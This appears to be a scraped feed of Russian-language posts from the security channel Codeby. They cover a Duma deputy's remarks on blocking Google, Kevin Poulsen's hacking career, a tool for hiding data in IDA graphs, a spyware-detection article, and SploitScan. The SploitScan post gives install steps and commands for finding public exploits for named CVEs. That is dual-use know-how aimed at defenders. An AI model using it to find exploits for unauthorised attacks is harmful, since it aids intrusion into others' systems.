В Госдуме допустили возможность блокировки абсолютно всех сервисов Google в России, объясняя это необходимостью защиты государственности и соблюдения закона о хранении персональных данных.

По словам депутата, причиной потенциальных ограничений является то, что Google продолжает хранить персональные данные пользователей за пределами России, в том числе в Европе и США. Свинцов считает, что это создает значимые риски, поскольку российский бизнес широко использует иностранные облачные сервисы и размещает там сведения о финансовом состоянии, выпускаемой продукции, технологиях, оборудовании, сервисных контрактах и финансовых операциях.

Свинцов также заявил, что в России сформировалась тенденция «мягкого выдавливания всего американского». По его мнению, если государство намерено «сохранить нашу экономику» и «сохранить нашу государственность», необходимо учитывать любые аспекты зависимости от зарубежной цифровой инфраструктуры, включая популярные иностранные онлайн-сервисы.

При этом парламентарий признал, что российский бизнес за многие годы выстроил системы управления на базе сервисов Google и привык к ним. Однако он подчеркнул, что, «я вам гарантирую на 100%, что огромное количество российских IT-решений ничем не уступают западным», а часть из них, будучи более современными, даже превосходит зарубежные аналоги по качеству. По словам Свинцова, некоторые отечественные решения еще нуждаются в доработке, но этот процесс оценивается не в годы, а в сроки порядка нескольких месяцев.

Депутат назвал текущий курс на замещение иностранных платформ «абсолютно правильной тенденцией» «мягкого выдавливания всего американского с территории Российской Федерации». Он не исключил, что сервисы Google и другие зарубежные платформы могут в перспективе постепенно сталкиваться с замедлением работы и усложнением доступа, чтобы у граждан и компаний был переходный период для миграции на российские аналоги.

Источник:https://www.gazeta.ru/tech/news/2025/12/11/27388915.shtml?utm_auth=false

🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

Читать полностью…

Codeby

🥷 Прячем данные в графе IDA

🔗 Ссылка на утилиту: https://github.com/xoreaxeaxeax/REpsych/tree/master

#ida #полезное
➡️ Все наши каналы 💬 Все наши чаты

Читать полностью…

Codeby

🟧Его путь начался не с преступления, а с любопытства. Будучи подростком в 1980-х, Поулсен, как и многие пионеры цифровой эры, изучал мир. Но его талант к проникновению в системы быстро перерос хобби. В 1983 году, в возрасте 17 лет, он под псевдонимом Dark Dante совершил символичный прорыв — взломал сеть ARPANET, экспериментальный проект Министерства обороны США, из которого позже вырос интернет.

Его поймали, но суд над несовершеннолетним был бы слишком громким процессом, и ему вынесли лишь предупреждение. Это была первая и последняя снисходительность системы по отношению к нему.


🟧Уход в тень и охота на секреты
Предупреждение не сработало. Наоборот, оно показало Поулсену уязвимость самих защитников. Он продолжил взламывать, но теперь его цели были серьезнее. В 1988 году он проник в компьютерную сеть федерального ведомства, добывая секретные документы, касающиеся свергнутого президента Филиппин Фердинанда Маркоса и его семьи. Когда ФБР начало расследование, Поулсен не стал дожидаться ареста — он исчез.
Началась жизнь в бегах, которая продлится
17 месяцев
. Но это не была жизнь в затворничестве. Это была жизнь хакера-призрака, который атаковал из тени.


🟧Легендарный взлом KIIS-FM
Именно в статусе беглеца он совершил свой самый знаменитый и наглый взлом, который навсегда вписал его имя в поп-культуру. В 1990 году радиостанция KIIS-FM в Лос-Анджелесе проводила розыгрыш: Porsche 944 S2, $20.000 и поездка на двоих доставались 102-му позвонившему.

Для Поулсена, виртуоза телефонных сетей (фрикеров), это была не лотерея, а инженерная задача. Он взломал телефонную станцию, обслуживавшую радиостанцию, и заблокировал все входящие линии, оставив активной лишь одну — свою. Позвонив, он стал единственным возможным «победителем».
История о «хакере, укравшем Porsche», облетела Америку, сделав «Тёмного Данте» народной легендой. Но за этим каскадерским трюком скрывалась куда более мрачная деятельность.


🟧Взлом базы данных, КГБ и телефонный криминал
ФБР охотилось на него не из-за Porsche. Его реальные преступления били в самое сердце государственной безопасности:
🟧Поулсен проник в компьюеры, где хранились засекреченные файлы. Хуже всего было то, что он получил доступ к планам по прослушиванию телефонных разговоров иностранных агентов. Он не просто смотрел — он предупреждал цели слежки, делая работу контрразведки бесполезной.
🟧Расследование предполагало, что Поулсен мог передавать информацию агенту советской разведки. Хотя прямых обвинений не последовало, этот фактор накалил обстановку до предела.
🟧Он использовал свои навыки для помощи другу, владельцу эскорт-агентства, восстанавливая удаленные клиентами номера телефонов, что было прямым соучастием в незаконной деятельности.

🟧Арест и самый суровый приговор в истории
Его взяли 17 апреля 1991 года в супермаркете «Хьюз» в Лос-Анджелесе после долгой и изнурительной слежки. Судебный процесс стал показательным. Власти хотели создать прецедент. И им это удалось.
В 1994 году Поулсен признал вину по множественным пунктам обвинения. Судья, не видя в нем «невинного гика», вынес беспрецедентный вердикт: 51 месяц лишения свободы (более 4 лет) и штраф в $56.000.
На тот момент это был самый длинный тюремный срок в США за компьютерные преступления. Дополнительным ударом стал запрет на использование компьютеров в течение
3 лет
после освобождения.


🟧Из хакера в разработчика инструментов для свободы
Освободившись, он кардинально изменил траекторию.
Самым важным его проектом стала разработка (совместно с А. Шварцем и Дж. Доланом) SecureDrop (изначально — DeadDrop). Это платформа с открытым исходным кодом для безопасной и анонимной передачи информации от осведомителей к журналистам. Понимая её критическую важность, Поулсен передал код Фонду свободы прессы.
Сегодня
SecureDrop
используется
The New York Times, The Guardian, ProPublica
и другими ведущими изданиями, став щитом для правды в цифровую эпоху.


🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

Читать полностью…

Codeby

🔍 SploitScan

Мощный и удобный инструмент, предназначенный для упрощения процесса поиска эксплойтов для известных уязвимостей и определения вероятности их использования. Особенно полезен для специалистов, которые хотят усилить меры безопасности или разработать надежные стратегии обнаружения новых угроз.

git clone https://github.com/xaitax/SploitScan.git
cd sploitscan
pip install -r requirements.txt


Особенности
⏺️Поиск информации CVE
⏺️Интеграция с EPSS
⏺️Агрегирование общедоступных уязвимостей
⏺️Интеграция CISA KEV
⏺️Оценка рисков на основе искусственного интеллекта
⏺️Поиск упоминаний в отчетах HackerOne
⏺️Система определения приоритетности исправлений
⏺️Поддержка нескольких CVE и параметров экспорта
⏺️Импорт результатов сканирования уязвимостей
⏺️Возможность выбора конкретного метода получения данных
⏺️Обновление и клонирование локальной базы данных CVE
⏺️Поиск уязвимостей CVE по ключевым словам в разных источниках как в локальной базе данных, так и в удаленных источниках
⏺️Быстрый режим для оптимизации вывода
⏺️Удобный интерфейс

💣 Поддерживаемые базы данных эксплойтов: GitHub, ExploitDB, VulnCheck, Nuclei, Metasploit

📁 Поддержка импорта сканера уязвимостей: Nessus (.nessus), Nexpose (.xml), OpenVAS (.xml), Docker (.json)

🔑Требуемые ключи API: VulnCheck, OpenAI, Google Gemini, xAI Grok, DeepSeek.

🤖 Оценка рисков с помощью ИИ
SploitScan интегрируется с OpenAI, чтобы обеспечить комплексную оценку рисков с помощью ИИ для каждой уязвимости CVE. Эта функция включает в себя:
⏺️Подробную оценку рисков: понимание природы уязвимости и ее влияния на бизнес.
⏺️Возможные сценарии атак: описание возможных сценариев атак с использованием уязвимости.
⏺️Рекомендации по снижению рисков: конкретные практические рекомендации по снижению рисков.
⏺️Краткое изложение: доступное для неспециалистов краткое изложение, в котором подчеркивается влияние на бизнес и срочность принятия мер.

💱 Примеры использования
sploitscan CVE-2024-1709 CVE-2024-21413

sploitscan.py --ai openai CVE-2024-21413

sploitscan -k "Outlook Express"

sploitscan CVE-2024-1709 --fast-mode

sploitscan --import-file path/to/yourfile.nessus --type nessus

sploitscan CVE-2024-1709 -m cisa,epss


🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

Читать полностью…

Codeby

Обнаружение шпионского ПО: руководство для ИБ-профессионалов

Вы уверены, что ваши данные в безопасности? Пока вы читаете этот текст, шпионское ПО может тихо сливать конфиденциальную информацию или отслеживать каждый ваш шаг в сети.

Мы подготовили для специалистов по безопасности исчерпывающее практическое руководство по борьбе со скрытой угрозой ⬇️

В
статье расскажем:
💠Эволюция угрозы: от кейлоггеров до фреймворков вроде Pegasus с zero‑day уязвимостями.
💠Анатомия врага: Разберем классификацию шпионского ПО (кейлоггеры, инфостилеры, сталкервары) и изучим сложные механизмы его проникновения
💠Практическая лаборатория: методы обнаружения от IOC до анализа в контролируемой среде. Разберем реальные кейсы и инструменты
💠Стратегии защиты: многоуровневая оборона от классических решений до поведенческого анализа с ИИ. Рассмотрим «гигиену» безопасности и критическую роль обучения пользователей.
💠Этика и закон: грань между легальным анализом и нарушением законодательства, моральные дилеммы ИБ‑специалистов.

🔘Эта статья поможет не только обнаружить "шпиона", но и создать среду, где ему сложно закрепиться.

Если вы хотите углубиться в тему — читайте ➡️ полную статью и превратите свои знания в надёжный щит для данных

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

Читать полностью…
Subscribe to a channel